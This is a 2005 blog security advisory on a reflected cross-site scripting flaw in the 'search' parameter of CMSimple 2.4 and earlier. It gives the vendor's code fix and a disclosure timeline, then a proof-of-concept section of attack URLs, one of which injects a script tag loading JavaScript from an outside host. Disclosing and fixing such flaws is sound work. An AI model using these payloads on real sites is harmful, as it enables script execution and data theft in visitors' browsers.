##############################################
CMSimple 'search' variable XSS
Vendor urL:http://www.cmsimple.dk/
Advisory:http://lostmon.blogspot.com/2005/07/
cmsimple-search-variable-xss.html
vendor fix:http://www.cmsimple.dk/
forum/viewtopic.php?t=2470
Vendor confirmed:YES exploit available:yes
OSVDB ID: 18128
Secunia: SA16147
BID: 14346
Securitytracker: 1014556
##############################################
CMSimple is a simple content management system; for the smart
maintenance of small commercial or private sites.
It is simple - small - smart!
CMSimple contains a flaw that allows a remote cross site scripting
attack.This flaw exists because the application does not validate
'search' variable upon submission to 'index.php' script.This could
allow a user to create a specially crafted URL that would execute
arbitrary code in a user's browser within the trust relationship
between the browser and the server, leading to a loss of integrity.
Index.php file contains only a include to cmsimple/cms.php file.
#############
VERSIONS
#############
CMSimple 2.4 and earlier versions
#############
Solution
#############
vendor fix:
http://www.cmsimple.dk/forum/viewtopic.php?t=2470
Fix:
function printlink(){global $f,$search,$file,$sn,$su,$tx;$t=amp().'print';if($f=='search')$t.=amp().'function=search'.amp().'search='.$search;
should be replaced with:
function printlink(){global $f,$search,$file,$sn,$su,$tx;$t=amp().'print';if($f=='search')$t.=amp().'function=search'.amp().'search='.htmlspecialchars(stripslashes($search));
Will be fixed in next beta.
#############
Timeline
#############
discovered: 13-07-2005
vendor notify:20-07-2005
vendor response:21-07-2005
vendor fix:21-07-2005
disclosure:21-07-2005
################
Proof of concept
################
http://[victim]/index.php?&print&function=search&search="><script src="http://www.drorshalev.com/dev/injection/js.js"></script>
http://[victim]/?function=search&search=[XSS-CODE]
http://[victim]/?&print&function=search&search=[XSS-CODE]
http://[victim]/?License&function=search&search=[XSS-CODE]
http://[victim]/?Resellers&function=search&search=[XSS-CODE]
http://[victim]/?&guestbook&function=search&search=[XSS-CODE]
###################### €nd #########################
Thnx to estrella to be my ligth
thnx to http://www.drorshalev.com/ for hosting 'js.js' script
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
skip to main |
skip to sidebar
Security Research & Analisys:
Personal Blog where I expose my investigations,
advisores and some outstanding news on security.
Categories
Archives
-
►
2022
(2)
- ► November 2022 (1)
- ► October 2022 (1)
-
►
2013
(2)
- ► December 2013 (1)
- ► August 2013 (1)
-
►
2012
(5)
- ► April 2012 (1)
-
►
2011
(5)
- ► October 2011 (1)
- ► March 2011 (1)
-
►
2010
(18)
- ► December 2010 (2)
- ► September 2010 (1)
- ► March 2010 (1)
- ► February 2010 (1)
- ► January 2010 (1)
-
►
2009
(25)
- ► November 2009 (1)
- ► April 2009 (1)
- ► March 2009 (1)
- ► February 2009 (1)
-
►
2008
(24)
- ► August 2008 (9)
- ► April 2008 (1)
- ► March 2008 (1)
-
►
2007
(29)
- ► October 2007 (1)
- ► March 2007 (1)
-
►
2006
(14)
- ► August 2006 (1)
- ► February 2006 (1)
-
▼
2005
(54)
- ► December 2005 (1)
- ► April 2005 (14)
Browse
About:Me
My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com
La curiosidad es lo que hace
mover la mente...
Online Tools & Calculators
Posts
Lostmon Blogger © All Rights Reserved